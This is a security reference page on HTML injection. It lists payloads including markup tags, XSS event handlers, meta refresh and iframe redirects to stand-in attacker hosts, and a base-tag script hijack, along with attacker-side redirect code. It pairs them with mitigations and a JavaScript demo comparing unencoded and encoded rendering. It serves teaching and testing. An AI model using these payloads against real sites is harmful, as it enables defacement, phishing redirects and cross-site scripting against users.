HTML Injection
HTML injection occurs when user-controlled input is written into a page's HTML without being encoded for the context it lands in (element text, an attribute value, or a raw-text element such as <script> or <title>), so the input is parsed as markup instead of being displayed as data. The impact ranges from defacement and fake login forms to redirects and, wherever script execution is not blocked, cross-site scripting; most payloads below first confirm that markup is rendered, and the ones carrying event handlers then escalate to XSS. The fix is context-aware output encoding, with a Content-Security-Policy as defence in depth.
Payloads
testqwerty<b>12345</b>
<h1>Injected Heading</h1>
<b>test</b>
<marquee>test</marquee>
<font color=red>test</font>
<blink>test</blink>
<i>Italic</i>
<img src=x onerror=alert(1)>
</div><h1>Injected</h1>
</title><h1>Injected</h1>
</div><img src=x onerror=alert(1)>
<!-- injected -->
<!--<script>alert(1)</script>-->
"><b>bold</b>
</script><svg/onload=alert(1)>
"><iframe src="https://evil.com">
<a href="https://evil.com">Click me!</a>
<div style=position:absolute;width:100%;height:100%;background:red;z-index:9>Foobar</div>
<meta name=language content=1;https://evil.com HTTP-EQUIV=refresh />
<meta http-equiv="refresh" content="2; https://evil.com/" />
<base href="https://attacker-website.com">
<iframe src=//malicious-website.com/toplevel.html></iframe>
<link rel="dns-prefetch" href="//AAA.BBB.CCC.DDD.attacker.webserver.com">
<img src="x" onerror="alert(1)">
<svg/onload=alert(1)>
<iframe src="https://evil.com">
<body onload=alert(1)>
<video><source onerror=alert(1)>
<a href="javascript:alert(1)">click</a>
<input type="text" autofocus onfocus=alert(1)>
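Whether a payload from this list works depends on the context the input lands in and on whether it is encoded for that context. The following is an added example and is not part of the original page: a small renderer that reflects input into element text, a double-quoted attribute and a JavaScript string, once unencoded and once encoded, and then reports which payloads still produce markup. The template strings and sample inputs are constructed for the demo, and the injection checks are heuristics, not a real HTML parser.

```javascript
// Added example (not from the page): reflect user input into three HTML
// contexts, unencoded and encoded, and check which payloads from the list
// above still produce markup. Template strings and the sample inputs are
// constructed for this demo; the checks are heuristics, not a full HTML parser.

// Constructed inputs: one benign value and payloads copied from the list above.
const SAMPLES = {
  benign: "Alice",
  bold: "<b>test</b>",
  imgOnerror: "<img src=x onerror=alert(1)>",
  attrBreakout: '"><b>bold</b>',
  closeDiv: "</div><h1>Injected</h1>",
  scriptBreakout: "</script><svg/onload=alert(1)>",
};

// Encode the five characters that matter in element text and quoted attribute
// values. Encoding the quotes is what defeats the "> attribute breakout.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Contexts 1 and 2: element text and a double-quoted attribute value.
function renderUnsafe(name) {
  return `<div class="greeting">Hello, ${name}</div>\n` +
         `<input type="text" name="name" value="${name}">`;
}
function renderSafe(name) {
  const v = escapeHtml(name);
  return `<div class="greeting">Hello, ${v}</div>\n` +
         `<input type="text" name="name" value="${v}">`;
}

// Context 3: a JavaScript string inside <script>. The HTML parser closes the
// script element at the first "</script" it sees, before any JavaScript runs,
// so JSON quoting alone does not help; "<" must be written as \u003c.
function renderScriptUnsafe(name) {
  return `<script>var name = ${JSON.stringify(name)};</script>`;
}
function renderScriptSafe(name) {
  const js = JSON.stringify(name).replace(/</g, "\\u003c");
  return `<script>var name = ${js};</script>`;
}

// Heuristic checks. countTags counts start/end tags in the output; each
// template emits a fixed number, so any surplus came from the input.
// countScriptEnds counts "</script", the only thing that matters in context 3.
function countTags(html) {
  return (html.match(/<\/?[a-zA-Z][^\s\/>]*/g) || []).length;
}
function countScriptEnds(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// True when `input` adds markup beyond what the template emits for empty input.
function isInjectable(render, input, count) {
  return count(render(input)) > count(render(""));
}

const CHECKS = [
  ["text/attr unsafe", renderUnsafe, countTags],
  ["text/attr safe", renderSafe, countTags],
  ["script unsafe", renderScriptUnsafe, countScriptEnds],
  ["script safe", renderScriptSafe, countScriptEnds],
];

// For every sample and every renderer, report whether injection succeeds.
function survey() {
  const result = {};
  for (const [sample, input] of Object.entries(SAMPLES)) {
    result[sample] = {};
    for (const [label, render, count] of CHECKS) {
      result[sample][label] = isInjectable(render, input, count);
    }
  }
  return result;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [sample, row] of Object.entries(survey())) {
    const cells = Object.entries(row).map(([l, v]) => `${l}=${v}`).join("  ");
    console.log(`${sample.padEnd(15)} ${cells}`);
  }
}
```

Run it with node; each row shows whether a payload adds markup under each renderer. Two details are worth noting. Encoding only < and > is not enough in the attribute context, because the leading quote in "><b>bold</b> still closes the attribute and lets the attacker append new attributes. In the script context the JSON quoting is irrelevant, because the HTML tokenizer ends the script element at </script before the JavaScript engine ever sees the string, which is why </script><svg/onload=alert(1)> works and why < has to be written as \u003c there.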
Base
An injected <base> element changes the base URL against which every relative URL parsed after it is resolved. A page that already includes a script by a relative path, like the second line below, then fetches that script from the attacker's host instead of its own, with no need to inject a <script> tag at all:
<base href="https://attacker-website.com">
<script src="/assets/some-script.js"></script>
A Content-Security-Policy with base-uri 'self' blocks the injected <base>; a script-src 'self' allowlist also blocks the resulting cross-origin script fetch, since the resolved URL is no longer same-origin.
Iframe
The injected frame loads an attacker-controlled page, which then navigates the top-level window, turning a passive markup injection into a full redirect of the victim:
<iframe src=//malicious-website.com/toplevel.html></iframe>
Contents of toplevel.html on the attacker's server:
<html><head></head><body><script>top.window.location = "https://malicious-website.com/pwned.html"</script></body></html>
Modern Chromium-based browsers block top-level navigation from a cross-origin frame that has not received a user gesture, so the redirect may only fire after the victim interacts with the frame. A Content-Security-Policy frame-src (or child-src) directive that excludes the attacker's host stops the frame from loading.